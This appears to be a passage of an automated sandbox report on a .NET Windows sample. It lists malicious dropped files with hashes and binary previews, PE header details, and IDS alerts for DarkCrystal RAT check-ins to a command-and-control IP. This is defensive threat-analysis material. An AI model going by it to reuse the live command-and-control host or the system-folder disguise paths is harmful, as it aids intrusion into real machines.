Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\oxAuScwr.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\pGrkhfIF.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\pLpTuJYH.log

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vlAbNuev.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\waJkCVMY.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\yuIieleo.log

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\zdFkvbcm.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zuWaRqDn.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Windows\BitLockerDiscoveryVolumeContents\599871f56ea49f

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	ASCII text, with very long lines (349), with no line terminators
Category:	dropped
Size (bytes):	349
Entropy (8bit):	5.854843750961647
Encrypted:	false
SSDEEP:	6:FSe4bOoLkGNTN3fzwDrmZx9cKUZrQwzXmN+adXngRkBG6QEQ6knwBwS5ispQ:ke4bOYxNx38vez2iUaEAQ6krS8B
MD5:	4075B49585726054688ED9A7B9127719
SHA1:	6E556375A58F15E9CC5B18B73AD1BF90334605AB
SHA-256:	4A05513B95A946A9E1FF452A9B51CDAFCB15EF6E625BBAA9EABBDF337A9021EF
SHA-512:	574A60F8439C7784C321DCD49B11C59D83E419997A24E5ACC01F725BAF25BA479883FF394F330D0D536AA3C80FD0A98A08B66902F74687BD1E9F42692FC67CC3
Malicious:	false
Preview:	4LoDspMtkLQVfWzFeM1MxIRKwCe99fFWMvPPR29xnbsNWKUhkreJNwhv3eQqLMtFG3IuGjylNEjVaExms6YSA5JZNdWxmSlarnGcBjbB326INLVzqo8PybELushmNA94cIox7UkIeXYI8BMBIhG8UWmPi5sTCyy22CpEhh1WDzuaC6Ntffeq4BjGgYOClQGqjgP5VHdkpt4fmLNms9xgUH71cjiJSzuwsD1grRYYC3AKGEdULmTmdkVbiXcwiURz9HxiUq5akZdbHxuYFO8qfHTHsZ7TylzslKL9Q59er3BEG3UvnDqTVlU1ypz5tll9jvz6lvHKPd8mGPAyELqv5gWA0UKlF

C:\Windows\BitLockerDiscoveryVolumeContents\JPOyDhPFIytu.exe

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1912832
Entropy (8bit):	7.53583426684731
Encrypted:	false
SSDEEP:	24576:lZFeGcDsavzoey8aUB/WN0/AZ7mNUxrE3cmOrwAUqGStlkuVUoPYQhMaXeRTl:laiUB/WN0/AZ7mNUxrEle3/JVU0Yb
MD5:	330A09824E901F7C2FB65BE086DF1493
SHA1:	236A6A080F1EA340343BEDAB226A88B3B92EA9CF
SHA-256:	6C43C7E744EC4C55BEC5FA9156561D81015DB4CB2574C39648A5F5EFC69943FA
SHA-512:	8DA1191FB37876DB6E4747D3807999995DBD965C0D13D21B944B941E8455DAA7512C9322C7E56BB228C83FC8BABE849685685C16DD000CB3E8E5A3822E7A6C77
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.................(...........G... ...`....@.. ....................................@.................................`G..K....`.. ............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc... ....`.....................@....reloc..............................@..B.................G......H.......................T...wn...F.......................................0..........(.... ........8........E........9...8.......8....(.... ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8........0.......... ........8........E........~...........Z...F...8........~....(?...~....(C... ....?.... ....~....{....9....& ....8....~....9.... ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(7... .... .... ....s....~...

C:\Windows\BitLockerDiscoveryVolumeContents\JPOyDhPFIytu.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	123
Entropy (8bit):	4.838481397806265
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXuKFzUvfudNvj:Vx993DEUS5Uvfuj
MD5:	C1ECD9FA5724D4CD6975E832DE58D542
SHA1:	3ADCF62EAB00F6A267C01584CAB0C27E003311DB
SHA-256:	1B027403758FDC873D1482DBE4DF4B7267DF535C11F9EDEC9EEF8F8D26BC9B7D
SHA-512:	217A09D22BE21650AD938E90B047975D95E92DAE03512C62A962D3DA1886FF2CDCF5B368DC6B058766F3D1996B626792843B904AAA0CDEC5ACB82405EB7A04F0
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 27/09/2024 22:41:19..22:41:19, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.53583426684731
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	yQrCGtNgsf.exe
File size:	1'912'832 bytes
MD5:	330a09824e901f7c2fb65be086df1493
SHA1:	236a6a080f1ea340343bedab226a88b3b92ea9cf
SHA256:	6c43c7e744ec4c55bec5fa9156561d81015db4cb2574c39648a5f5efc69943fa
SHA512:	8da1191fb37876db6e4747d3807999995dbd965c0d13d21b944b941e8455daa7512c9322c7e56bb228c83fc8babe849685685c16dd000cb3e8e5a3822e7a6c77
SSDEEP:	24576:lZFeGcDsavzoey8aUB/WN0/AZ7mNUxrE3cmOrwAUqGStlkuVUoPYQhMaXeRTl:laiUB/WN0/AZ7mNUxrEle3/JVU0Yb
TLSH:	3595BE1661A24F32C265573196A3013E9291E7763612FE0B395F518BBC4BBF18E722F3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.................(...........G... ...`....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x5d47ae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x65DB1BD9 [Sun Feb 25 10:52:09 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d4760	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d6000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1d8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1d27b4	0x1d2800	3c9fc85433a505002aeb7f0c328e868d	False	0.778592975448821	data	7.539307714759452	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1d6000	0x320	0x400	3720f37e3ecb95f78fcf18a649002524	False	0.3525390625	data	2.6537284131589467	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1d8000	0xc	0x200	178aea7439e28e402c943db286f2c544	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1d6058	0x2c8	data			0.46207865168539325

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-28T03:22:24.935813+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.8	49710	37.44.238.250	80	TCP
2024-09-28T03:22:37.732694+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.8	49713	37.44.238.250	80	TCP
2024-09-28T03:22:46.107744+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.8	49714	37.44.238.250	80	TCP
2024-09-28T03:22:58.560918+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.8	49715	37.44.238.250	80	TCP
2024-09-28T03:23:06.389074+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.8	49717	37.44.238.250	80	TCP
2024-09-28T03:23:14.982976+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.8	49718	37.44.238.250	80	TCP
2024-09-28T03:23:22.654698+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.8	49719	37.44.238.250	80	TCP
2024-09-28T03:23:51.088999+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.8	49722	37.44.238.250	80	TCP
2024-09-28T03:24:13.014173+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.8	49723	37.44.238.250	80	TCP
2024-09-28T03:24:21.107865+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.8	49724	37.44.238.250	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2024 03:22:24.267976046 CEST	49710	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:24.272876978 CEST	80	49710	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:24.272957087 CEST	49710	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:24.273345947 CEST	49710	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:24.278093100 CEST	80	49710	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:24.624340057 CEST	49710	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:24.629232883 CEST	80	49710	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:24.886893988 CEST	80	49710	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:24.935812950 CEST	49710	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:25.016946077 CEST	80	49710	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:25.060802937 CEST	49710	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:25.413114071 CEST	49710	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:37.078600883 CEST	49713	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:37.083673000 CEST	80	49713	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:37.083785057 CEST	49713	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:37.084182024 CEST	49713	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:37.089128971 CEST	80	49713	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:37.436346054 CEST	49713	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:37.441193104 CEST	80	49713	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:37.686213970 CEST	80	49713	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:37.732693911 CEST	49713	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:37.814670086 CEST	80	49713	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:37.857712984 CEST	49713	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:38.816211939 CEST	49713	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:45.427982092 CEST	49714	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:45.432903051 CEST	80	49714	37.44.238.250	192.168.2.8
